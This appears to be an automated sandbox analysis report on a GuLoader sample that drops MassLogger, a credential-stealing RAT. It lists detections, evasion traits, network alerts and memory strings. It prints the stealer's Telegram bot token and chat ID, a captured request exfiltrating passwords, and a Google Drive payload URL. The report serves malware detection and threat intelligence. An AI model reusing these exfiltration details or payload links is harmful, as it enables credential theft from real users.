Edit tour

Windows Analysis Report
WGi85dsMNp.exe

Overview

General Information

Sample name:	WGi85dsMNp.exe renamed because original name is a hash value
Original sample name:	5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a.exe
Analysis ID:	1588318
MD5:	2275024102505f0997f027c71970750d
SHA1:	10a4feb8f216f86caa840ff85ba02c85e00e8665
SHA256:	5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Disable Task Manager(disabletaskmgr)

Disables CMD prompt

Disables the Windows task manager (taskmgr)

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

WGi85dsMNp.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\WGi85dsMNp.exe" MD5: 2275024102505F0997F027C71970750D)

WGi85dsMNp.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\WGi85dsMNp.exe" MD5: 2275024102505F0997F027C71970750D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2180305657.0000000003349000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: WGi85dsMNp.exe PID: 1476	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: WGi85dsMNp.exe PID: 1476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WGi85dsMNp.exe PID: 1476	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:04:28.155649+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49784	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:04:20.641993+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	193.122.130.0	80	TCP
2025-01-11T00:04:27.173384+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	193.122.130.0	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:04:15.689028+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49705	142.250.186.78	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:04:27.847490+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49784	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a138391b77Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D34000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: WGi85dsMNp.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002698000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: WGi85dsMNp.exe, 00000002.00000002.3921978113.0000000004250000.00000004.00001000.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz
Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz5
Source: WGi85dsMNp.exe, 00000002.00000003.2263229811.0000000002707000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.000000000271F000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: WGi85dsMNp.exe, 00000002.00000003.2263229811.0000000002707000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download
Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download#h
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49784 version: TLS 1.2

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040558F

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_004034A5

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_00404DCC	0_2_00404DCC
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_00406AF2	0_2_00406AF2
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_6F941B5F	0_2_6F941B5F
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00404DCC	2_2_00404DCC
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00406AF2	2_2_00406AF2
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00164328	2_2_00164328
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00168DA0	2_2_00168DA0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00165F90	2_2_00165F90
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00162DD1	2_2_00162DD1
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B5560	2_2_354B5560
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BCCA0	2_2_354BCCA0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BF64B	2_2_354BF64B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B7628	2_2_354B7628
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B332B	2_2_354B332B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B03C4	2_2_354B03C4
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BBD88	2_2_354BBD88
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BB4EC	2_2_354BB4EC
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BCC91	2_2_354BCC91
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BE790	2_2_354BE790
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BC64B	2_2_354BC64B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BDEF3	2_2_354BDEF3
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B6EA3	2_2_354B6EA3
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B6EA0	2_2_354B6EA0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BB944	2_2_354BB944
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BC1F2	2_2_354BC1F2
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354B7848	2_2_354B7848
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BF053	2_2_354BF053
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BB07F	2_2_354BB07F
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BB093	2_2_354BB093
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BE34B	2_2_354BE34B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BEBF7	2_2_354BEBF7
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BAAEA	2_2_354BAAEA
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BDA9B	2_2_354BDA9B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9BDF0	2_2_35A9BDF0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A99D10	2_2_35A99D10
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A91400	2_2_35A91400
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A996C8	2_2_35A996C8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A98650	2_2_35A98650
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9A9B0	2_2_35A9A9B0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9A360	2_2_35A9A360
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9BA97	2_2_35A9BA97
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A94DB0	2_2_35A94DB0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9BDE1	2_2_35A9BDE1
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A99D00	2_2_35A99D00
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A92560	2_2_35A92560
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A974B8	2_2_35A974B8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A91CB0	2_2_35A91CB0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A974C8	2_2_35A974C8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A96C18	2_2_35A96C18
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A90FA8	2_2_35A90FA8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A967B0	2_2_35A967B0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9AFF8	2_2_35A9AFF8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9AFF7	2_2_35A9AFF7
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A967C0	2_2_35A967C0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A95F10	2_2_35A95F10
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A93F60	2_2_35A93F60
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A93F70	2_2_35A93F70
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A936C0	2_2_35A936C0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A92E10	2_2_35A92E10
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A95660	2_2_35A95660
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A95650	2_2_35A95650
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9A9A0	2_2_35A9A9A0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A929B8	2_2_35A929B8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9F120	2_2_35A9F120
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A9F130	2_2_35A9F130
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A92108	2_2_35A92108
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A94820	2_2_35A94820
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A90037	2_2_35A90037
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A97061	2_2_35A97061
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A97070	2_2_35A97070
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A90040	2_2_35A90040
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A91858	2_2_35A91858
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A913F0	2_2_35A913F0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A943C8	2_2_35A943C8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A93B18	2_2_35A93B18
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A96368	2_2_35A96368
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A97B63	2_2_35A97B63
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A95AB8	2_2_35A95AB8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A95208	2_2_35A95208
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A95207	2_2_35A95207
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35A93268	2_2_35A93268
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35DFD608	2_2_35DFD608
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_35DF8328	2_2_35DF8328

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: String function: 00402C41 appears 51 times

Source: WGi85dsMNp.exe, 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs WGi85dsMNp.exe
Source: WGi85dsMNp.exe, 00000002.00000002.3941594169.0000000032AC7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs WGi85dsMNp.exe
Source: WGi85dsMNp.exe, 00000002.00000000.2174421272.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs WGi85dsMNp.exe
Source: WGi85dsMNp.exe	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs WGi85dsMNp.exe

Source: WGi85dsMNp.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/8@5/5

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_004034A5

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404850

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_00402104

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

File created: C:\Users\user\AppData\Local\Iw

Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

File created: C:\Users\user\AppData\Local\Temp\nsdC34B.tmp

Jump to behavior

Source: WGi85dsMNp.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: WGi85dsMNp.exe, 00000002.00000002.3942746552.0000000033CED000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DE4000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DD8000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DB5000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DA5000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DC3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WGi85dsMNp.exe	Virustotal: Detection: 76%
Source: WGi85dsMNp.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

File read: C:\Users\user\Desktop\WGi85dsMNp.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"	Jump to behavior

